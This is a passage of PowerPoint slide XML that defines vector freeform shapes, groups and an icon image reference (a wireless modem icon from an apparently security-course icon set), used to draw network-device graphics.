                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 1455"/>
                  <a:gd name="T10" fmla="*/ 0 h 196"/>
                  <a:gd name="T11" fmla="*/ 1455 w 1455"/>
                  <a:gd name="T12" fmla="*/ 196 h 1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55" h="196">
                    <a:moveTo>
                      <a:pt x="0" y="19"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="733" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1455" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grpFill/>
              <a:ln w="635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35" name="Freeform 2817"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2309" y="2429"/>
                <a:ext cx="1141" cy="135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1141 w 1141"/>
                  <a:gd name="T1" fmla="*/ 0 h 135"/>
                  <a:gd name="T2" fmla="*/ 572 w 1141"/>
                  <a:gd name="T3" fmla="*/ 135 h 135"/>
                  <a:gd name="T4" fmla="*/ 0 w 1141"/>
                  <a:gd name="T5" fmla="*/ 0 h 135"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 1141"/>
                  <a:gd name="T10" fmla="*/ 0 h 135"/>
                  <a:gd name="T11" fmla="*/ 1141 w 1141"/>
                  <a:gd name="T12" fmla="*/ 135 h 13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41" h="135">
                    <a:moveTo>
                      <a:pt x="1141" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="572" y="135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36" name="Freeform 2818"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2472" y="2011"/>
                <a:ext cx="815" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 815"/>
                  <a:gd name="T1" fmla="*/ 0 h 104"/>
                  <a:gd name="T2" fmla="*/ 411 w 815"/>
                  <a:gd name="T3" fmla="*/ 104 h 104"/>
                  <a:gd name="T4" fmla="*/ 815 w 815"/>
                  <a:gd name="T5" fmla="*/ 0 h 104"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 815"/>
                  <a:gd name="T10" fmla="*/ 0 h 104"/>
                  <a:gd name="T11" fmla="*/ 815 w 815"/>
                  <a:gd name="T12" fmla="*/ 104 h 1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15" h="104">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="411" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="815" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grpFill/>
              <a:ln w="635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37" name="Freeform 2819"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2633" y="1593"/>
                <a:ext cx="493" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 493 w 493"/>
                  <a:gd name="T1" fmla="*/ 0 h 64"/>
                  <a:gd name="T2" fmla="*/ 241 w 493"/>
                  <a:gd name="T3" fmla="*/ 64 h 64"/>
                  <a:gd name="T4" fmla="*/ 0 w 493"/>
                  <a:gd name="T5" fmla="*/ 0 h 64"/>
                  <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T9" fmla="*/ 0 w 493"/>
                  <a:gd name="T10" fmla="*/ 0 h 64"/>
                  <a:gd name="T11" fmla="*/ 493 w 493"/>
                  <a:gd name="T12" fmla="*/ 64 h 6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93" h="64">
                    <a:moveTo>
                      <a:pt x="493" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="241" y="64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38" name="Oval 2820"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2739" y="816"/>
                <a:ext cx="281" cy="281"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln w="635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339" name="Freeform 2783"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2375265" y="3213061"/>
              <a:ext cx="2063751" cy="555625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pic>
          <p:nvPicPr>
            <p:cNvPr id="340" name="Picture 3" descr="Z:\CEH v7 - Haja\Haja Premium Icons\Wireless_Modem.png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78191" y="3047153"/>
              <a:ext cx="417706" cy="41770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41" name="Group 2847"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2787855" y="3025970"/>
              <a:ext cx="314325" cy="560388"/>
              <a:chOff x="2738" y="59"/>
              <a:chExt cx="566" cy="1006"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="342" name="Line 2848"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="2853" y="535"/>
                <a:ext cx="54" cy="1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3" name="Line 2849"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="2853" y="548"/>
                <a:ext cx="54" cy="1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4" name="Freeform 2850"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2955" y="757"/>
                <a:ext cx="349" cy="308"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2268"/>
                  <a:gd name="T1" fmla="*/ 607 h 2003"/>
                  <a:gd name="T2" fmla="*/ 2268 w 2268"/>
                  <a:gd name="T3" fmla="*/ 0 h 2003"/>
                  <a:gd name="T4" fmla="*/ 2268 w 2268"/>
                  <a:gd name="T5" fmla="*/ 1396 h 2003"/>
                  <a:gd name="T6" fmla="*/ 5 w 2268"/>
                  <a:gd name="T7" fmla="*/ 2003 h 2003"/>
                  <a:gd name="T8" fmla="*/ 0 w 2268"/>
                  <a:gd name="T9" fmla="*/ 607 h 20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68"/>
                  <a:gd name="T16" fmla="*/ 0 h 2003"/>
                  <a:gd name="T17" fmla="*/ 2268 w 2268"/>
                  <a:gd name="T18" fmla="*/ 2003 h 200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68" h="2003">
                    <a:moveTo>
                      <a:pt x="0" y="607"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2268" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2268" y="1396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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5" name="Freeform 2851"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2749" y="795"/>
                <a:ext cx="207" cy="268"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1349"/>
                  <a:gd name="T1" fmla="*/ 359 h 1741"/>
                  <a:gd name="T2" fmla="*/ 0 w 1349"/>
                  <a:gd name="T3" fmla="*/ 0 h 1741"/>
                  <a:gd name="T4" fmla="*/ 2 w 1349"/>
                  <a:gd name="T5" fmla="*/ 1380 h 1741"/>
                  <a:gd name="T6" fmla="*/ 1349 w 1349"/>
                  <a:gd name="T7" fmla="*/ 1741 h 1741"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1349"/>
                  <a:gd name="T9" fmla="*/ 359 h 17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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 1741"/>
                  <a:gd name="T17" fmla="*/ 1349 w 1349"/>
                  <a:gd name="T18" fmla="*/ 1741 h 17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9" h="1741">
                    <a:moveTo>
                      <a:pt x="1344" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1349" y="1741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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6" name="Freeform 2852"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2749" y="701"/>
                <a:ext cx="555" cy="149"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3612"/>
                  <a:gd name="T1" fmla="*/ 609 h 968"/>
                  <a:gd name="T2" fmla="*/ 2284 w 3612"/>
                  <a:gd name="T3" fmla="*/ 0 h 968"/>
                  <a:gd name="T4" fmla="*/ 3612 w 3612"/>
                  <a:gd name="T5" fmla="*/ 361 h 968"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3612"/>
                  <a:gd name="T7" fmla="*/ 968 h 968"/>
                  <a:gd name="T8" fmla="*/ 0 w 3612"/>
                  <a:gd name="T9" fmla="*/ 609 h 9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12"/>
                  <a:gd name="T16" fmla="*/ 0 h 968"/>
                  <a:gd name="T17" fmla="*/ 3612 w 3612"/>
                  <a:gd name="T18" fmla="*/ 968 h 9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12" h="968">
                    <a:moveTo>
                      <a:pt x="0" y="609"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2284" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3612" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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7" name="Freeform 2853"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3031" y="559"/>
                <a:ext cx="69" cy="235"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 452"/>
                  <a:gd name="T1" fmla="*/ 1526 h 1526"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 121 h 1526"/>
                  <a:gd name="T4" fmla="*/ 452 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 1526"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 1406 h 1526"/>
                  <a:gd name="T8" fmla="*/ 0 w 452"/>
                  <a:gd name="T9" fmla="*/ 1526 h 15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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 1526"/>
                  <a:gd name="T17" fmla="*/ 452 w 452"/>
                  <a:gd name="T18" fmla="*/ 1526 h 15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2" h="1526">
                    <a:moveTo>
                      <a:pt x="0" y="1526"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="1406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152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8" name="Freeform 2854"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2961" y="559"/>
                <a:ext cx="70" cy="235"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 453"/>
                  <a:gd name="T1" fmla="*/ 0 h 1526"/>
                  <a:gd name="T2" fmla="*/ 0 w 453"/>
                  <a:gd name="T3" fmla="*/ 1406 h 1526"/>
                  <a:gd name="T4" fmla="*/ 453 w 453"/>
                  <a:gd name="T5" fmla="*/ 1526 h 1526"/>
                  <a:gd name="T6" fmla="*/ 453 w 453"/>
                  <a:gd name="T7" fmla="*/ 121 h 1526"/>
                  <a:gd name="T8" fmla="*/ 0 w 453"/>
                  <a:gd name="T9" fmla="*/ 0 h 15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3"/>
                  <a:gd name="T16" fmla="*/ 0 h 1526"/>
                  <a:gd name="T17" fmla="*/ 453 w 453"/>
                  <a:gd name="T18" fmla="*/ 1526 h 15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3" h="1526">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="1526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="121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9" name="Freeform 2855"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2961" y="541"/>
                <a:ext cx="139" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 905"/>
                  <a:gd name="T1" fmla="*/ 120 h 241"/>
                  <a:gd name="T2" fmla="*/ 453 w 905"/>
                  <a:gd name="T3" fmla="*/ 0 h 241"/>
                  <a:gd name="T4" fmla="*/ 905 w 905"/>
                  <a:gd name="T5" fmla="*/ 120 h 241"/>
                  <a:gd name="T6" fmla="*/ 453 w 905"/>
                  <a:gd name="T7" fmla="*/ 241 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 905"/>
                  <a:gd name="T9" fmla="*/ 120 h 2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05"/>
                  <a:gd name="T16" fmla="*/ 0 h 241"/>
                  <a:gd name="T17" fmla="*/ 905 w 905"/>
                  <a:gd name="T18" fmla="*/ 241 h 2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05" h="241">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="453" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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0" name="Freeform 2856"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2816" y="433"/>
                <a:ext cx="139" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 905 w 905"/>
                  <a:gd name="T1" fmla="*/ 1184 h 1184"/>
                  <a:gd name="T2" fmla="*/ 0 w 905"/>
                  <a:gd name="T3" fmla="*/ 938 h 1184"/>
                  <a:gd name="T4" fmla="*/ 0 w 905"/>
                  <a:gd name="T5" fmla="*/ 0 h 1184"/>
                  <a:gd name="T6" fmla="*/ 905 w 905"/>
                  <a:gd name="T7" fmla="*/ 246 h 1184"/>
                  <a:gd name="T8" fmla="*/ 905 w 905"/>
                  <a:gd name="T9" fmla="*/ 1184 h 1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05"/>
                  <a:gd name="T16" fmla="*/ 0 h 1184"/>
                  <a:gd name="T17" fmla="*/ 905 w 905"/>
                  <a:gd name="T18" fmla="*/ 1184 h 1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05" h="1184">
                    <a:moveTo>
                      <a:pt x="905" y="1184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="938"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="118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1" name="Freeform 2857"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2955" y="397"/>
                <a:ext cx="276" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1795 w 1795"/>
                  <a:gd name="T1" fmla="*/ 0 h 1420"/>
                  <a:gd name="T2" fmla="*/ 1795 w 1795"/>
                  <a:gd name="T3" fmla="*/ 936 h 1420"/>
                  <a:gd name="T4" fmla="*/ 0 w 1795"/>
                  <a:gd name="T5" fmla="*/ 1420 h 1420"/>
                  <a:gd name="T6" fmla="*/ 0 w 1795"/>
                  <a:gd name="T7" fmla="*/ 482 h 1420"/>
                  <a:gd name="T8" fmla="*/ 1795 w 1795"/>
                  <a:gd name="T9" fmla="*/ 0 h 14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95"/>
                  <a:gd name="T16" fmla="*/ 0 h 1420"/>
                  <a:gd name="T17" fmla="*/ 1795 w 1795"/>
                  <a:gd name="T18" fmla="*/ 1420 h 14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95" h="1420">
                    <a:moveTo>
                      <a:pt x="1795" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1795" y="936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1795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2" name="Freeform 2858"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2945" y="381"/>
                <a:ext cx="348" cy="106"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2267"/>
                  <a:gd name="T1" fmla="*/ 607 h 690"/>
                  <a:gd name="T2" fmla="*/ 2267 w 2267"/>
                  <a:gd name="T3" fmla="*/ 0 h 690"/>
                  <a:gd name="T4" fmla="*/ 2267 w 2267"/>
                  <a:gd name="T5" fmla="*/ 76 h 690"/>
                  <a:gd name="T6" fmla="*/ 0 w 2267"/>
                  <a:gd name="T7" fmla="*/ 690 h 690"/>
                  <a:gd name="T8" fmla="*/ 0 w 2267"/>
                  <a:gd name="T9" fmla="*/ 607 h 6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67"/>
                  <a:gd name="T16" fmla="*/ 0 h 690"/>
                  <a:gd name="T17" fmla="*/ 2267 w 2267"/>
                  <a:gd name="T18" fmla="*/ 690 h 6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67" h="690">
                    <a:moveTo>
                      <a:pt x="0" y="607"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2267" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2267" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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3" name="Freeform 2859"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2738" y="419"/>
                <a:ext cx="207" cy="68"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T1" fmla="*/ 359 h 442"/>
                  <a:gd name="T2" fmla="*/ 0 w 1345"/>
                  <a:gd name="T3" fmla="*/ 0 h 442"/>
                  <a:gd name="T4" fmla="*/ 3 w 1345"/>
                  <a:gd name="T5" fmla="*/ 76 h 442"/>
                  <a:gd name="T6" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T7" fmla="*/ 442 h 442"/>
                  <a:gd name="T8" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T9" fmla="*/ 359 h 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5"/>
                  <a:gd name="T16" fmla="*/ 0 h 442"/>
                  <a:gd name="T17" fmla="*/ 1345 w 1345"/>
                  <a:gd name="T18" fmla="*/ 442 h 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5" h="442">
                    <a:moveTo>
                      <a:pt x="1345" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1345" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1345" y="3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4" name="Freeform 2860"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2738" y="325"/>
                <a:ext cx="555" cy="149"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3612"/>
                  <a:gd name="T1" fmla="*/ 609 h 968"/>
                  <a:gd name="T2" fmla="*/ 2285 w 3612"/>
                  <a:gd name="T3" fmla="*/ 0 h 968"/>
                  <a:gd name="T4" fmla="*/ 3612 w 3612"/>
                  <a:gd name="T5" fmla="*/ 361 h 968"/>
                  <a:gd name="T6" fmla="*/ 1345 w 3612"/>
                  <a:gd name="T7" fmla="*/ 968 h 968"/>
                  <a:gd name="T8" fmla="*/ 0 w 3612"/>
                  <a:gd name="T9" fmla="*/ 609 h 9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12"/>
                  <a:gd name="T16" fmla="*/ 0 h 968"/>
                  <a:gd name="T17" fmla="*/ 3612 w 3612"/>
                  <a:gd name="T18" fmla="*/ 968 h 9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12" h="968">
                    <a:moveTo>
                      <a:pt x="0" y="609"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2285" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3612" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1345" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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5" name="Freeform 2861"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2832" y="464"/>
                <a:ext cx="106" cy="119"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 685"/>
                  <a:gd name="T1" fmla="*/ 0 h 775"/>
                  <a:gd name="T2" fmla="*/ 0 w 685"/>
                  <a:gd name="T3" fmla="*/ 591 h 775"/>
                  <a:gd name="T4" fmla="*/ 685 w 685"/>
                  <a:gd name="T5" fmla="*/ 775 h 775"/>
                  <a:gd name="T6" fmla="*/ 685 w 685"/>
                  <a:gd name="T7" fmla="*/ 185 h 775"/>
                  <a:gd name="T8" fmla="*/ 0 w 685"/>
                  <a:gd name="T9" fmla="*/ 0 h 7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5"/>
                  <a:gd name="T16" fmla="*/ 0 h 775"/>
                  <a:gd name="T17" fmla="*/ 685 w 685"/>
                  <a:gd name="T18" fmla="*/ 775 h 77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5" h="775">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="775"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="1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6" name="Freeform 2862"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2842" y="475"/>
                <a:ext cx="86" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 562"/>
                  <a:gd name="T1" fmla="*/ 0 h 633"/>
                  <a:gd name="T2" fmla="*/ 0 w 562"/>
                  <a:gd name="T3" fmla="*/ 482 h 633"/>
                  <a:gd name="T4" fmla="*/ 562 w 562"/>
                  <a:gd name="T5" fmla="*/ 633 h 633"/>
                  <a:gd name="T6" fmla="*/ 562 w 562"/>
                  <a:gd name="T7" fmla="*/ 152 h 633"/>
                  <a:gd name="T8" fmla="*/ 0 w 562"/>
                  <a:gd name="T9" fmla="*/ 0 h 6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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 633"/>
                  <a:gd name="T17" fmla="*/ 562 w 562"/>
                  <a:gd name="T18" fmla="*/ 633 h 6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2" h="633">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="152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357" name="Group 2863"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2988" y="431"/>
                <a:ext cx="207" cy="152"/>
                <a:chOff x="2988" y="431"/>
                <a:chExt cx="207" cy="152"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="424" name="Freeform 2864"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2988" y="431"/>
                  <a:ext cx="207" cy="152"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1354"/>
                    <a:gd name="T1" fmla="*/ 990 h 990"/>
                    <a:gd name="T2" fmla="*/ 0 w 1354"/>
                    <a:gd name="T3" fmla="*/ 364 h 990"/>
                    <a:gd name="T4" fmla="*/ 711 w 1354"/>
                    <a:gd name="T5" fmla="*/ 175 h 990"/>
                    <a:gd name="T6" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T7" fmla="*/ 0 h 990"/>
                    <a:gd name="T8" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T9" fmla="*/ 626 h 990"/>
                    <a:gd name="T10" fmla="*/ 711 w 1354"/>
                    <a:gd name="T11" fmla="*/ 796 h 990"/>
                    <a:gd name="T12" fmla="*/ 0 w 1354"/>
                    <a:gd name="T13" fmla="*/ 990 h 99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54"/>
                    <a:gd name="T22" fmla="*/ 0 h 990"/>
                    <a:gd name="T23" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T24" fmla="*/ 990 h 99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54" h="990">
                      <a:moveTo>
                        <a:pt x="0" y="990"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="626"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="796"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="99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25" name="Freeform 2865"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3000" y="471"/>
                  <a:ext cx="86" cy="98"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 560 w 560"/>
                    <a:gd name="T1" fmla="*/ 0 h 636"/>
                    <a:gd name="T2" fmla="*/ 560 w 560"/>
                    <a:gd name="T3" fmla="*/ 485 h 636"/>
                    <a:gd name="T4" fmla="*/ 0 w 560"/>
                    <a:gd name="T5" fmla="*/ 636 h 636"/>
                    <a:gd name="T6" fmla="*/ 0 w 560"/>
                    <a:gd name="T7" fmla="*/ 152 h 636"/>
                    <a:gd name="T8" fmla="*/ 560 w 560"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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0"/>
                    <a:gd name="T16" fmla="*/ 0 h 636"/>
                    <a:gd name="T17" fmla="*/ 560 w 560"/>
                    <a:gd name="T18" fmla="*/ 636 h 6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0" h="636">
                      <a:moveTo>
                        <a:pt x="560" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="560" y="485"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="636"/>
                      </a:lnTo>
                      <a:lnTo>
